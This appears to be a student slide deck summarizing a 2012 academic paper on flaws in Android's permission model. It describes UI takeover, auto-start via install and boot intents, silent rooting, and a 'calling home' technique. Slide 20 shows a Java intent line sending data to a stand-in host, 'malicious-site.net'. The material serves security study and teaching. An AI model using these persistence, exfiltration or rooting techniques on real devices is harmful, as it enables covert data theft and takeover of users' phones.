出處 2012 IEEE 11th International Conference on Trust Security and Privacy in Computing and Communications 作者 Andre Egners Ulrike Meyer Bjorn Marschollek ID: 341351
Download Presentation The PPT/PDF document "Messing with Android's Permission Model" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
Slide1
Messing with Android's Permission Model
出處:
2012
IEEE 11th International Conference on Trust, Security and
Privacy
in
Computing and Communications
作者:
Andr’e
Egners
, Ulrike
Meyer ,
Bjorn
Marschollek
組員
:
9720114
王人弘
9820117
陳冠謀
9862218
盧軒偉Slide2
Outline
Introduction
Related work
Overview on AndroidAndroid’s permission modelAttacksUI takeoverStarting Applications after InstallationStarting Applications at BootE.T. Calling HomeSilently Rooting AndroidConclusion
2/23Slide3
I. INTRODUCTION
在行動裝置上安裝
APP
時,通常會跳出對話框,要求使用者接受程式所請求的權限或是停止安裝。使用者對於給予的權限可能會造成什麼風險並不清楚。Permission Model的設計上,各種選項的精細程度和可變程度太小,這使攻擊者容易繞過Permission Model的控管。本篇會介紹Android的Permission Model及一些攻擊的方式。 3/23Slide4
II. RELATED WORK
殭屍網路
(botnet)
Inter-Application communicationPermissions of Android apps其他安全機制與系統漏洞的相關議題 4/23Slide5
III. OVERVIEW ON ANDROID
Based on 2.6 Linux kernel
具有
Linux的優點(file, memory management)和Java類型的安全性 5/23Slide6
III. OVERVIEW ON ANDROID
(Cont
.)
6/23Slide7
III. OVERVIEW ON ANDROID
(Cont.)
最底層是
Linux kernel,包含process和memory的管理、各種驅動程式……。針對行動裝置的需求進行優化。第二層是各種函式庫,包含C library,圖形的2D/3D-graphic library,整理檔案資料的SQLite...…。同樣在第二層的還有Android runtime所需要的東西,主要是Dalvik Virtual Machine,由Java Virtual Machine衍生而來,更適合用在資源有限的裝置上。 7/23Slide8
III. OVERVIEW ON ANDROID
(Cont.)
Application Framework Layer
:提供API給應用程式的開發者使用。其中包含了Package Manager (追蹤管理應用程式和它的資料)、 Location Manager (管理應用程式的位置)、View System (UI、繪圖) ……。最上層是應用程式所在的地方,third-party applications都在這層。可以使用下面的框架、函式庫……。 8/23Slide9
IV. ANDROID’S PERMISSION MODEL
API version 11,116 different permissions are predefine
Ex. INTERNET – allow accessing the Internet
RECEIVE_SMS – for monitoring, recording, or processing incoming SMS RECORD_AUDIO – for recording audio messages Ex. Tetris game request Internet is reasonable but suspicious if it would also requested the permission to read the address book 9/23Slide10
URI Permissions
Uniform Resource Identifier
Applications may wish to pass a
URI to another application in order to be able to exchange data.For example, an email application usually protects its emails from being read by other applications using additionally defined permissions.a third-party image viewer should not hold the permissions to read emails directly.image viewer should rather be handed a URI to the data by using the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI.10/23Slide11
Permission protection level
Level zero
– normal permissions ,low risk
setting timer, making the phone vibrate the user can request to be notified of the permission request prior to the installation of the application. Level one – dangerous permissions ,high risk initiating phone calls, access to the device’s sensors, the Internet, or sensitive user data, read log file Prior to the installation, installer displays the set of requested dangerous permissions to the user, which decides to either grant or deny the set permissions Only if the user gives his consent to all of the requested permissions, the application can successfully be installed.11/23Slide12
Permission protection level (Cont.)
Level two
– signature permissions
only if the requesting application is signed with the same certificate as the application that declared the permissionuser agree but no signature cannot be grantedLevel three – signatureOrSystem only to applications that are in the Android system image or that are signed with the same certificates .12/23Slide13
Permission protection level (Cont.)
some flaws
the user is only able to grant or deny all permissions at once.
granting or denying a particular permission is not possible. refraining from installing an application which might be useful, but requests too many or a suspicious set of permissions. Tetris example13/23Slide14
Known Vulnerabilities
Log permissions
FAT32 formatted SD cards
WebKit browser Most uncovered the past years14/23Slide15
V. ATTACKS
Taking over the
UI
Starting directly after installationAlso starting at bootTwo-way Internet communicationSilently rooting the deviceAn attack path to silently root android15/23Slide16
1.UI takeover
KeyIntercepter
- onKeyDown() :
handle
or
pass
- handle them but doing nothing
The Home button
-
Return to Home screen
or
Show a list of the recently
used
Installing from Android Market
- The install button -??-> The OK button
16/23Slide17
2.Starting Applications after Installation
Would the user start the app?
to receive the INSTALL_REFERRER intent
- Google Analytics SDK
- chosen by the
attacker
17/23Slide18
2.Starting
Applications after
Installation
(Cont.)
<
receiver
Android:name=“com.google.android.apps.analytics.AnalyticsReceiver”
Android:exported=“true” >
<intent-filter>
<action android:nace=“com.android.vending.INSTALL_REFERRER”/>
</intent-filter>
</receiver>
18/23Slide19
3.Starting Applications at Boot
BOOT_COMPLETED intent
Permission
–RECEIVE_BOOT_COMPLETED is introduced to prevent from illegitimately starting at system boot... but is forgotten Successfully listenning for the intent without asking for permission 19/23Slide20
4.E.T. Calling Home
Establishing bidiectional outside communication
e.g. a specified dropzone delivering user data,or
a command & control server of a botnet-----------------------------VIEW intent---------------------------------------------
startActivity(new Intent(Intent.ACTION_VIEW, Uri.
Parse(''
http://malicious-site.net
'')).
setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
20/23Slide21
4.E.T. Calling Home (Cont.)
Request HTTP GET to send data
URI schemes : deliver data to applications
SilentCommunicator- screen off: start the transmission- screen on: browser hide21/23Slide22
5.Silently Rooting Android
modified zimperlich-jailbreak
:each instance runs with
root
privileges
setuid() calls which intended to change the owner to the user but has been assigned to the calling application -> fail
infinite loop which executes the native code until exception
Root user can install app and the device owner will not notice!
22/23Slide23
VI. CONCLUSION
本篇文章提供了一些Android權限模型的漏洞。攻擊者可藉由這些漏洞,偷偷的建立雙向的通道,並下載額外的攻擊。更可以利用不令人起疑的授權請求,來做更複雜的攻擊。23/23